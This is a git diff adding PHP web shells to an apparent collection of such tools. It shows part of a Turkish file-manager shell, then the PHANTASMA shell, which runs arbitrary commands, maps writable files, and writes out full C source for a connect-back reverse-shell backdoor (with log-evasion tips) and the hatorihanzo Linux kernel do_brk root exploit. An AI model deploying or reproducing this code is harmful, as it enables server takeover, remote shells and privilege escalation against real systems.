+                <td width="100%" bgcolor="#B7B7B7" bordercolor="#9F9F9F" height="13"
+                onmouseover='this.style.background="D9D9D9"'
+                onmouseout='this.style.background="9F9F9F"'
+                style="CURSOR: hand"
+                
+                
+                
+                
+                >
+                <p align="center"><font face="Verdana" style="font-size: 8pt">
+
+
+
+
+
+
+                <a href="<?echo "$fistik.php?dizin=$dizin/../"?>" style="text-decoration: none">
+                <font color="#000000">Üst Klasör</font></a></font></td>
+
+              </tr>
+            </table>
+            </td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+
+
+
+<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber3" height="21">
+  <tr>
+    <td width="625" bgcolor="#000000"><span style="font-size: 2pt">&nbsp;</span></td>
+  </tr>
+  <tr>
+    <td bgcolor="#000000" height="20">
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#000000" id="AutoNumber23" bgcolor="#A3A3A3" width="373" height="19">
+      <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber26">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" 
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+        
+        height="19" bordercolor="#000000">
+        <span style="font-weight: 700">
+        <font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+        <a color="#9F9F9F" target="_blank" href="<?echo "$fistik.php?sistembilgisi=1";?>" style="text-decoration: none"><font color="#9F9F9F">Sistem Bilgisi</font></a></font></font></span></td>
+          </tr>
+        </table>
+        </td>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber27">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19" 
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+        bordercolor="#000000">
+        <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
+        <a href="<?echo "$fistik.php?yenklas=1&dizin=$dizin";?>" style="text-decoration: none">
+        <font color="#9F9F9F">Yeni Klasör</font></a></font></td>
+          </tr>
+        </table>
+        </td>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber28">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19"
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+		bordercolor="#000000">
+        <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
+        <a href="<?echo "$fistik.php?yendos=1&dizin=$dizin";?>" style="text-decoration: none"><font color="#9F9F9F">Yeni Dosya</font></a> </font></td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+  </table>
+
+  
+
+
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber7" height="17">
+  <tr>
+    <td width="30" height="17" bgcolor="#9F9F9F">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Tür</font></td>
+    <td height="17" bgcolor="#9F9F9F">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Dosya 
+    Adý</font></td>
+    <td width="122" height="17" bgcolor="#9F9F9F">
+    <p align="center">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Ýþlem</font></td>
+  </tr>
+</table>
+
+<?
+if ($sedat=@opendir($dizin)){
+while (($ekinci=readdir ($sedat))){
+if (is_dir("$dizin/$ekinci")){
+?>
+
+<? if ($ekinci=="." or  $ekinci=="..") {
+} else {
+?>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="17">
+  <tr>
+    <td width="30" height="17" bgcolor="#808080">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif"></td>
+    <td height="17" bgcolor="#C4C4C4">
+    <font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$ekinci" ?></font></td>
+    <td width="61" height="17" bgcolor="#C4C4C4" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber15" height="20">
+      <tr>
+        <td width="100%" bgcolor="#A3A3A3"
+        onmouseover="this.style.background='#BBBBBB'"
+        onmouseout="this.style.background='#A3A3A3'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="<?echo "$fistik.php?dizin=$dizin/" ?><?echo "$ekinci";?>" style="text-decoration: none">
+        <font color="#000000">Aç</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+    <td width="60" height="17" bgcolor="#C4C4C4" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber18" height="20">
+      <tr>
+        <td width="100%" bgcolor="#A3A3A3"
+        onmouseover="this.style.background='#BBBBBB'"
+        onmouseout="this.style.background='#A3A3A3'"
+
+
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="<?echo "$fistik.php?silklas=$dizin/$ekinci&dizin=$dizin"?>" style="text-decoration: none">
+        <font color="#000000">Sil</font></a>
+
+        </font></td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+<?
+}
+?>
+
+<?
+}}}
+closedir($sedat);
+?>
+
+<?
+if ($sedat=@opendir($dizin)){
+while (($ekinci=readdir ($sedat))){
+if (is_file("$dizin/$ekinci")){
+
+?>
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="1">
+  <tr>
+    <td width="30" height="1" bgcolor="#B0B0B0">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/1.gif"></td>
+    <td height="1" bgcolor="#EAEAEA">
+    <font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$ekinci" ?></font>
+    <font face="Arial Narrow" style="font-size: 8pt">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;   ( XXX )&nbsp;</font></td>
+    <td width="61" height="1" bgcolor="#D6D6D6" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber12" height="20">
+      <tr>
+        <td width="100%" bgcolor="#D6D6D6"
+        onmouseover="this.style.background='#ACACAC'"
+        onmouseout="this.style.background='#D6D6D6'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a style="text-decoration: none" target="_self" href="<?echo "$fistik";?>.php?duzenle=<?echo "$ekinci";?>&dizin=<?echo $dizin;?>">
+        <font color="#000000">Düzenle</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+    <td width="60" height="1" bgcolor="#D6D6D6" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber13" height="100%">
+      <tr>
+        <td width="100%" bgcolor="#D6D6D6" no wrap
+        onmouseover="this.style.background='#ACACAC'"
+        onmouseout="this.style.background='#D6D6D6'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="<?echo "$fistik";?>.php?sildos=<?echo $ekinci;?>&dizin=<?echo $dizin;?>" style="text-decoration: none">
+        <font color="#000000">Sil</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+<?
+}}}
+closedir($sedat);
+?>
+
+
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber29">
+  <tr>
+    <td width="100%" bgcolor="#000000">&nbsp;</td>
+  </tr>
+</table>
+
+  <tr>
+    <td width="100%" bgcolor="#000000">
+    </body></html><? } ?><? } ?><? } ?><? } ?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/PHANTASMA.php.txt b/xakep-shells/PHP/PHANTASMA.php.txt
new file mode 100644
index 0000000..59f92af
--- /dev/null
+++ b/xakep-shells/PHP/PHANTASMA.php.txt
@@ -0,0 +1,634 @@
+<CENTER>
+<DIV STYLE="font-family: verdana; font-size: 25px; font-weight: bold; color: #F3b700;">PHANTASMA- NeW CmD ;) </DIV>
+<BR>
+<DIV STYLE="font-family: verdana; font-size: 20px; font-weight: bold; color: #F3b700;">Informação do sistema</DIV>
+<?php
+
+// 
+  closelog( );
+
+  $dono = get_current_user( );
+  $ver = phpversion( );
+  $login = posix_getuid( );
+  $euid = posix_geteuid( );
+  $gid = posix_getgid( );
+  if ($chdir == "") $chdir = getcwd( );
+
+?>
+<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0">
+<?php
+
+  $uname = posix_uname( );
+  while (list($info, $value) = each ($uname)) {
+
+?>
+  <TR>
+    <TD><DIV STYLE="font-family: verdana; font-size: 15px;"><?= $info ?>: <?= $value ?></DIV></TD>
+  </TR>
+<?php
+  }
+?>
+ 
+  <TR>
+   <TR>
+    <TD><DIV STYLE="font-family: verdana; font-size: 15px;">Script Current User: <?= $dono ?></DIV></TD>
+  </TR>
+  <TR>
+    <TD><DIV STYLE="font-family: verdana; font-size: 15px;">PHP Version: <?= $ver ?></DIV></TD>
+  </TR>
+  <TR>
+    <TD><DIV STYLE="font-family: verdana; font-size: 15px;">User Info: uid(<?= $login ?>) euid(<?= $euid ?>) gid(<?= $gid ?>)</DIV></TD>
+  </TR>
+  <TR>
+    <TD><DIV STYLE="font-family: verdana; font-size: 15px;">Current Path: <?= $chdir ?></DIV></TD>
+  </TR>
+  <TR>
+    <TD><DIV STYLE="font-family: verdana; font-size: 15px;">Server IP: <?php $aaa =  gethostbyname($SERVER_NAME);  echo $aaa;?></DIV></TD>
+  </TR>
+   <TR>
+    <TD><DIV STYLE="font-family: verdana; font-size: 15px;">Web Server: <?= "$SERVER_SOFTWARE $SERVER_VERSION"; ?></DIV></TD>
+  </TR>
+</TABLE>
+<BR>
+<?php
+
+  if ($cmd != "") {
+    echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Command Mode Run</DIV>";
+
+?>
+
+<DIV STYLE="font-family: verdana; font-size: 20px; font-weight: bold; color: #F3A700;">Command Stdout</DIV>
+<?php
+
+if ($fe == 1){
+$fe = "exec";
+}
+if ($fe == ""){
+$fe = "passthru";
+}
+if ($fe == "2"){
+$fe = "system";
+}
+
+    if (isset($chdir)) @chdir($chdir);
+
+    ob_start( );
+      $fe("$cmd  2>&1");
+      $output = ob_get_contents();
+    ob_end_clean( );
+
+?>
+<TEXTAREA COLS="75" ROWS="8" STYLE="font-family: verdana; font-size: 12px;">
+<?php
+
+    if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
+?>
+</TEXTAREA>
+<BR>
+<?php
+
+  }
+ 
+  if ($safemode != "") {
+    echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Safemode Mode Run</DIV>";
+
+?>
+<DIV STYLE="font-family: verdana; font-size: 20px; font-weight: bold; color: #F3A700;">Safe Mode Directory Listing</DIV>
+<?php
+
+    if ($dir = @opendir($chdir)) {
+      echo "<TABLE border=1 cellspacing=1 cellpadding=0>";
+      echo "<TR>";
+      echo "<TD valign=top>";
+      echo "<b><font size=2 face=arial>List All Files</b> <br><br>";
+      while (($file = readdir($dir)) !== false) {
+        if (@is_file($file)) {
+          $file1 = fileowner($file);
+          $file2 = fileperms($file);
+    	  echo "<font color=green>$file1 - $file2 - <a href=$SCRIPT_NAME?$QUERY_STRING&see=$file>$file</a><br>"; 
+	  // echo "<font color=green>$file1 - $file2 - $file </font><br>";
+          flush( );
+        }
+      }
+
+      echo "</TD>";
+      echo"<TD valign=top>";
+      echo "<b><font size=2 face=arial>List Only Folders</b> <br><br>";
+      if ($dir = @opendir($chdir)) {
+        while (($file = readdir($dir)) !== false) {
+          if (@is_dir($file)) {
+            $file1 = fileowner($file);
+            $file2 = fileperms($file);
+	    echo "<font color=blue>$file1 - $file2 - <a href=$SCRIPT_NAME?$QUERY_STRING&chdir=$chdir/$file>$file</a><br>"; 
+            // echo "<font color=blue>$file1 - $file2 - $file </font><br>";
+          }
+        }
+      }
+      echo "</TD>";
+      echo"<TD valign=top>";
+      echo "<b><font size=2 face=arial>List Writable Folders</b><br><br>";
+      if ($dir = @opendir($chdir)) {
+        while (($file = readdir($dir)) !== false) {
+          if (@is_writable($file) && @is_dir($file)) {
+            $file1 = fileowner($file);
+            $file2 = fileperms($file);
+            echo "<font color=red>$file1 - $file2 - $file </font><br>";
+          }
+        }
+      }
+      echo "</TD>";
+      echo "</TD>";
+      echo "<TD valign=top>";
+      echo "<b><font size=2 face=arial>List Writable Files</b> <br><br>";
+ 
+      if ($dir = opendir($chdir)) {
+        while (($file = readdir($dir)) !== false) {
+          if (@is_writable($file) && @is_file($file)) {
+            $file1 = fileowner($file);
+            $file2 = fileperms($file);
+    	    echo "<font color=red>$file1 - $file2 - $file </font><br>";
+          }
+        }
+      }
+      echo "</TD>";
+      echo "</TR>";
+      echo "</TABLE>";
+    }
+  }
+
+?>
+<?php
+
+  if ($shell == "write") {
+    $shell = "#include <stdio.h>\n" .
+             "#include <sys/socket.h>\n" .
+             "#include <netinet/in.h>\n" .
+             "#include <arpa/inet.h>\n" .
+             "#include <netdb.h>\n" .
+             "int main(int argc, char **argv) {\n" .
+             "  char *host;\n" .
+             "  int port = 80;\n" .
+             "  int f;\n" .
+             "  int l;\n" .
+             "  int sock;\n" .
+             "  struct in_addr ia;\n" .
+             "  struct sockaddr_in sin, from;\n" .
+             "  struct hostent *he;\n" .
+             "  char msg[ ] = \"Welcome to Data Cha0s Connect Back Shell\\n\\n\"\n" .
+             "                \"Issue \\\"export TERM=xterm; exec bash -i\\\"\\n\"\n" .
+             "                \"For More Reliable Shell.\\n\"\n" .
+             "                \"Issue \\\"unset HISTFILE; unset SAVEHIST\\\"\\n\"\n" .
+             "                \"For Not Getting Logged.\\n(;\\n\\n\";\n" .
+             "  printf(\"Data Cha0s Connect Back Backdoor\\n\\n\");\n" .
+             "  if (argc < 2 || argc > 3) {\n" .
+             "    printf(\"Usage: %s [Host] <port>\\n\", argv[0]);\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  printf(\"[*] Dumping Arguments\\n\");\n" .
+             "  l = strlen(argv[1]);\n" .
+             "  if (l <= 0) {\n" .
+             "    printf(\"[-] Invalid Host Name\\n\");\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  if (!(host = (char *) malloc(l))) {\n" .
+             "    printf(\"[-] Unable to Allocate Memory\\n\");\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  strncpy(host, argv[1], l);\n" .
+             "  if (argc == 3) {\n" .
+             "    port = atoi(argv[2]);\n" .
+             "    if (port <= 0 || port > 65535) {\n" .
+             "      printf(\"[-] Invalid Port Number\\n\");\n" .
+             "      return 1;\n" .
+             "    }\n" .
+             "  }\n" .
+             "  printf(\"[*] Resolving Host Name\\n\");\n" .
+             "  he = gethostbyname(host);\n" .
+             "  if (he) {\n" .
+             "    memcpy(&ia.s_addr, he->h_addr, 4);\n" .
+             "  } else if ((ia.s_addr = inet_addr(host)) == INADDR_ANY) {\n" .
+             "    printf(\"[-] Unable to Resolve: %s\\n\", host);\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  sin.sin_family = PF_INET;\n" .
+             "  sin.sin_addr.s_addr = ia.s_addr;\n" .
+             "  sin.sin_port = htons(port);\n" .
+             "  printf(\"[*] Connecting...\\n\");\n" .
+             "  if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {\n" .
+             "    printf(\"[-] Socket Error\\n\");\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {\n" .
+             "    printf(\"[-] Unable to Connect\\n\");\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  printf(\"[*] Spawning Shell\\n\");\n" .
+             "  f = fork( );\n" .
+             "  if (f < 0) {\n" .
+             "    printf(\"[-] Unable to Fork\\n\");\n" .
+             "    return 1;\n" .
+             "  } else if (!f) {\n" .
+             "    write(sock, msg, sizeof(msg));\n" .
+             "    dup2(sock, 0);\n" .
+             "    dup2(sock, 1);\n" .
+             "    dup2(sock, 2);\n" .
+             "    execl(\"/bin/sh\", \"shell\", NULL);\n" .
+             "    close(sock);\n" .
+             "    return 0;\n" .
+             "  }\n" .
+             "  printf(\"[*] Detached\\n\\n\");\n" .
+             "  return 0;\n" .
+             "}\n";
+
+    $fp = fopen("/tmp/dc-connectback.c", "w");
+    $ok = fwrite($fp, $shell);
+
+    if (!empty($ok)) {
+      echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Connect Back Shell Was Successfuly Copied</DIV>";
+    } else {
+      echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[-] An Error Has Ocurred While Copying Shell</DIV>";
+    }
+  }
+
+  if ($kernel == "write") {
+    $kernel = "/*\n" .
+              " * hatorihanzo.c\n" .
+              " * Linux kernel do_brk vma overflow exploit.\n" .
+              " *\n" .
+              " * The bug was found by Paul (IhaQueR) Starzetz <paul@isec.pl>\n" .
+              " *\n" .
+              " * Further research and exploit development by\n" .
+              " * Wojciech Purczynski <cliph@isec.pl> and Paul Starzetz.\n" .
+              " *\n" .
+              " * (c) 2003 Copyright by IhaQueR and cliph. All Rights Reserved.\n" .
+              " *\n" .
+              " * COPYING, PRINTING, DISTRIBUTION, MODIFICATION, COMPILATION AND ANY USE\n" .
+              " * OF PRESENTED CODE IS STRICTLY PROHIBITED.\n" .
+              "*/\n" .
+              "#define _GNU_SOURCE\n" .
+              "#include <stdio.h>\n" .
+              "#include <stdlib.h>\n" .
+              "#include <errno.h>\n" .
+              "#include <string.h>\n" .
+              "#include <unistd.h>\n" .
+              "#include <fcntl.h>\n" .
+              "#include <signal.h>\n" .
+              "#include <paths.h>\n" .
+              "#include <grp.h>\n" .
+              "#include <setjmp.h>\n" .
+              "#include <stdint.h>\n" .
+              "#include <sys/mman.h>\n" .
+              "#include <sys/ipc.h>\n" .
+              "#include <sys/shm.h>\n" .
+              "#include <sys/ucontext.h>\n" .
+              "#include <sys/wait.h>\n" .
+              "#include <asm/ldt.h>\n" .
+              "#include <asm/page.h>\n" .
+              "#include <asm/segment.h>\n" .
+              "#include <linux/unistd.h>\n" .
+              "#include <linux/linkage.h>\n" .
+              "#define kB   * 1024\n" .
+              "#define MB   * 1024 kB\n" .
+              "#define GB   * 1024 MB\n" .
+              "#define MAGIC             0xdefaced /* I should've patented this number -cliph */\n" .
+              "#define ENTRY_MAGIC 0\n" .
+              "#define ENTRY_GATE 2\n" .
+              "#define ENTRY_CS    4\n" .
+              "#define ENTRY_DS    6\n" .
+              "#define CS          ((ENTRY_CS << 2) | 4)\n" .
+              "#define DS          ((ENTRY_DS << 2) | 4)\n" .
+              "#define GATE        ((ENTRY_GATE << 2) | 4 | 3)\n" .
+              "#define LDT_PAGES   ((LDT_ENTRIES*LDT_ENTRY_SIZE+PAGE_SIZE-1) / PAGE_SIZE)\n" .
+              "#define TOP_ADDR    0xFFFFE000U\n" .
+              "/* configuration */\n" .
+              "unsigned     task_size;\n" .
+              "unsigned     page;\n" .
+              "uid_t        uid;\n" .
+              "unsigned     address;\n" .
+              "int dontexit = 0;\n" .
+              "void fatal(char * msg)\n" .
+              "{\n" .
+              "      fprintf(stderr, \"[-] %s: %s\\n\", msg, strerror(errno));\n" .
+              "      if (dontexit) {\n" .
+              "             fprintf(stderr, \"[-] Unable to exit, entering neverending loop.\\n\");\n" .
+              "             kill(getpid(), SIGSTOP);\n" .
+              "             for (;;) pause();\n" .
+              "      }\n" .
+              "      exit(EXIT_FAILURE);\n" .
+              "}\n" .
+              "void configure(void)\n" .
+              "{\n" .
+              "      unsigned val;\n" .
+              "      task_size = ((unsigned)&val + 1 GB ) / (1 GB) * 1 GB;\n" .
+              "      uid = getuid();\n" .
+              "}\n" .
+              "void expand(void)\n" .
+              "{\n" .
+              "      unsigned top = (unsigned) sbrk(0);\n" .
+              "      unsigned limit = address + PAGE_SIZE;\n" .
+              "      do {\n" .
+              "             if (sbrk(PAGE_SIZE) == NULL)\n" .
+              "                   fatal(\"Kernel seems not to be vulnerable\");\n" .
+              "             dontexit = 1;\n" .
+              "             top += PAGE_SIZE;\n" .
+              "      } while (top < limit);\n" .
+              "}\n" .
+              "jmp_buf jmp;\n" .
+              "#define MAP_NOPAGE 1\n" .
+              "#define MAP_ISPAGE 2\n" .
+              "void sigsegv(int signo, siginfo_t * si, void * ptr)\n" .
+              "{\n" .
+              "      struct ucontext * uc = (struct ucontext *) ptr;\n" .
+              "      int error_code = uc->uc_mcontext.gregs[REG_ERR];\n" .
+              "      (void)signo;\n" .
+              "      (void)si;\n" .
+              "      error_code = MAP_NOPAGE + (error_code & 1);\n" .
+              "      longjmp(jmp, error_code);\n" .
+              "}\n" .
+              "void prepare(void)\n" .
+              "{\n" .
+              "      struct sigaction sa;\n" .
+              "      sa.sa_sigaction = sigsegv;\n" .
+              "      sa.sa_flags = SA_SIGINFO | SA_NOMASK;\n" .
+              "      sigemptyset(&sa.sa_mask);\n" .
+              "      sigaction(SIGSEGV, &sa, NULL);\n" .
+              "}\n" .
+              "int testaddr(unsigned addr)\n" .
+              "{\n" .
+              "      int val;\n" .
+              "      val = setjmp(jmp);\n" .
+              "      if (val == 0) {\n" .
+              "             asm (\"verr (%%eax)\" : : \"a\" (addr));\n" .
+              "             return MAP_ISPAGE;\n" .
+              "      }\n" .
+              "      return val;\n" .
+              "}\n" .
+              "#define map_pages (((TOP_ADDR - task_size) + PAGE_SIZE - 1) / PAGE_SIZE)\n" .
+              "#define map_size (map_pages + 8*sizeof(unsigned) - 1) / (8*sizeof(unsigned))\n" .
+              "#define next(u, b) do { if ((b = 2*b) == 0) { b = 1; u++; } } while(0)\n" .
+              "void map(unsigned * map)\n" .
+              "{\n" .
+              "      unsigned addr = task_size;\n" .
+              "      unsigned bit = 1;\n" .
+              "      prepare();\n" .
+              "      while (addr < TOP_ADDR) {\n" .
+              "             if (testaddr(addr) == MAP_ISPAGE)\n" .
+              "                   *map |= bit;\n" .
+              "             addr += PAGE_SIZE;\n" .
+              "             next(map, bit);\n" .
+              "      }\n" .
+              "      signal(SIGSEGV, SIG_DFL);\n" .
+              "}\n" .
+              "void find(unsigned * m)\n" .
+              "{\n" .
+              "      unsigned addr = task_size;\n" .
+              "      unsigned bit = 1;\n" .
+              "      unsigned count;\n" .
+              "      unsigned tmp;\n" .
+              "      prepare();\n" .
+              "      tmp = address = count = 0U;\n" .
+              "      while (addr < TOP_ADDR) {\n" .
+              "             int val = testaddr(addr);\n" .
+              "             if (val == MAP_ISPAGE && (*m & bit) == 0) {\n" .
+              "                   if (!tmp) tmp = addr;\n" .
+              "                   count++;\n" .
+              "             } else {\n" .
+              "                   if (tmp && count == LDT_PAGES) {\n" .
+              "                          errno = EAGAIN;\n" .
+              "                          if (address)\n" .
+              "                                fatal(\"double allocation\\n\");\n" .
+              "                          address = tmp;\n" .
+              "                   }\n" .
+              "                   tmp = count = 0U;\n" .
+              "             }\n" .
+              "             addr += PAGE_SIZE;\n" .
+              "             next(m, bit);\n" .
+              "      }\n" .
+              "      signal(SIGSEGV, SIG_DFL);\n" .
+              "      if (address)\n" .
+              "             return;\n" .
+              "      errno = ENOTSUP;\n" .
+              "      fatal(\"Unable to determine kernel address\");\n" .
+              "}\n" .
+              "int modify_ldt(int, void *, unsigned);\n" .
+              "void ldt(unsigned * m)\n" .
+              "{\n" .
+              "      struct modify_ldt_ldt_s l;\n" .
+              "      map(m);\n" .
+              "      memset(&l, 0, sizeof(l));\n" .
+              "      l.entry_number = LDT_ENTRIES - 1;\n" .
+              "      l.seg_32bit = 1;\n" .
+              "      l.base_addr = MAGIC >> 16;\n" .
+              "      l.limit = MAGIC & 0xffff;\n" .
+              "      if (modify_ldt(1, &l, sizeof(l)) == -1)\n" .
+              "             fatal(\"Unable to set up LDT\");\n" .
+              "      l.entry_number = ENTRY_MAGIC / 2;\n" .
+              "      if (modify_ldt(1, &l, sizeof(l)) == -1)\n" .
+              "             fatal(\"Unable to set up LDT\");\n" .
+              "      find(m);\n" .
+              "}\n" .
+              "asmlinkage void kernel(unsigned * task)\n" .
+              "{\n" .
+              "      unsigned * addr = task;\n" .
+              "      /* looking for uids */\n" .
+              "      while (addr[0] != uid || addr[1] != uid ||\n" .
+              "             addr[2] != uid || addr[3] != uid)\n" .
+              "             addr++;\n" .
+              "      addr[0] = addr[1] = addr[2] = addr[3] = 0;    /* uids */\n" .
+              "      addr[4] = addr[5] = addr[6] = addr[7] = 0;    /* uids */\n" .
+              "      addr[8] = 0;\n" .
+              "      /* looking for vma */\n" .
+              "      for (addr = (unsigned *) task_size; addr; addr++) {\n" .
+              "             if (addr[0] >= task_size && addr[1] < task_size &&\n" .
+              "                 addr[2] == address && addr[3] >= task_size) {\n" .
+              "                   addr[2] = task_size - PAGE_SIZE;\n" .
+              "                   addr = (unsigned *) addr[3];\n" .
+              "                   addr[1] = task_size - PAGE_SIZE;\n" .
+              "                   addr[2] = task_size;\n" .
+              "                   break;\n" .
+              "             }\n" .
+              "      }\n" .
+              "}\n" .
+              "void kcode(void);\n" .
+              "#define __str(s) #s\n" .
+              "#define str(s) __str(s)\n" .
+              "void __kcode(void)\n" .
+              "{\n" .
+              "      asm(\n" .
+              "             \"kcode:                                \\n\"\n" .
+              "             \"     pusha                            \\n\"\n" .
+              "             \"     pushl %es                        \\n\"\n" .
+              "             \"     pushl %ds                        \\n\"\n" .
+              "             \"     movl   $(\" str(DS) \") ,%edx      \\n\"\n" .
+              "             \"     movl   %edx,%es                  \\n\"\n" .
+              "             \"     movl   %edx,%ds                  \\n\"\n" .
+              "             \"     movl   $0xffffe000,%eax          \\n\"\n" .
+              "             \"     andl   %esp,%eax                 \\n\"\n" .
+              "             \"     pushl %eax                       \\n\"\n" .
+              "             \"     call   kernel                    \\n\"\n" .
+              "             \"     addl   $4, %esp                  \\n\"\n" .
+              "             \"     popl   %ds                       \\n\"\n" .
+              "             \"     popl   %es                       \\n\"\n" .
+              "             \"     popa                             \\n\"\n" .
+              "             \"     lret                             \\n\"\n" .
+              "      );\n" .
+              "}\n" .
+              "void knockout(void)\n" .
+              "{\n" .
+              "      unsigned * addr = (unsigned *) address;\n" .
+              "      if (mprotect(addr, PAGE_SIZE, PROT_READ|PROT_WRITE) == -1)\n" .
+              "             fatal(\"Unable to change page protection\");\n" .
+              "      errno = ESRCH;\n" .
+              "      if (addr[ENTRY_MAGIC] != MAGIC)\n" .
+              "             fatal(\"Invalid LDT entry\");\n" .
+              "      /* setting call gate and privileged descriptors */\n" .
+              "      addr[ENTRY_GATE+0] = ((unsigned)CS << 16) | ((unsigned)kcode & 0xffffU);\n" .
+              "      addr[ENTRY_GATE+1] = ((unsigned)kcode & ~0xffffU) | 0xec00U;\n" .
+              "      addr[ENTRY_CS+0] = 0x0000ffffU; /* kernel 4GB code at 0x00000000 */\n" .
+              "      addr[ENTRY_CS+1] = 0x00cf9a00U;\n" .
+              "      addr[ENTRY_DS+0] = 0x0000ffffU; /* user   4GB code at 0x00000000 */\n" .
+              "      addr[ENTRY_DS+1] = 0x00cf9200U;\n" .
+              "      prepare();\n" .
+              "      if (setjmp(jmp) != 0) {\n" .
+              "             errno = ENOEXEC;\n" .
+              "             fatal(\"Unable to jump to call gate\");\n" .
+              "      }\n" .
+              "      asm(\"lcall $\" str(GATE) \",$0x0\");      /* this is it */\n" .
+              "}\n" .
+              "void shell(void)\n" .
+              "{\n" .
+              "      char * argv[] = { _PATH_BSHELL, NULL };\n" .
+              "      execve(_PATH_BSHELL, argv, environ);\n" .
+              "      fatal(\"Unable to spawn shell\\n\");\n" .
+              "}\n" .
+              "void remap(void)\n" .
+              "{\n" .
+              "      static char stack[8 MB];  /* new stack */\n" .
+              "      static char * envp[] = { \"PATH=\" _PATH_STDPATH, NULL };\n" .
+              "      static unsigned * m;\n" .
+              "      static unsigned b;\n" .
+              "      m = (unsigned *) sbrk(map_size);\n" .
+              "      if (!m)\n" .
+              "             fatal(\"Unable to allocate memory\");\n" .
+              "      environ = envp;\n" .
+              "      asm (\"movl %0, %%esp\\n\" : : \"a\" (stack + sizeof(stack)));\n" .
+              "      b = ((unsigned)sbrk(0) + PAGE_SIZE - 1) & PAGE_MASK;\n" .
+              "      if (munmap((void*)b, task_size - b) == -1)\n" .
+              "             fatal(\"Unable to unmap stack\");\n" .
+              "      while (b < task_size) {\n" .
+              "             if (sbrk(PAGE_SIZE) == NULL)\n" .
+              "                   fatal(\"Unable to expand BSS\");\n" .
+              "             b += PAGE_SIZE;\n" .
+              "      }\n" .
+              "      ldt(m);\n" .
+              "      expand();\n" .
+              "      knockout();\n" .
+              "      shell();\n" .
+              "}\n" .
+              "int main(void)\n" .
+              "{\n" .
+              "      configure();\n" .
+              "      remap();\n" .
+              "      return EXIT_FAILURE;\n" .
+              "}\n";
+
+    $fp = fopen("/tmp/xpl_brk.c", "w");
+    $ok = fwrite($fp, $kernel);
+    
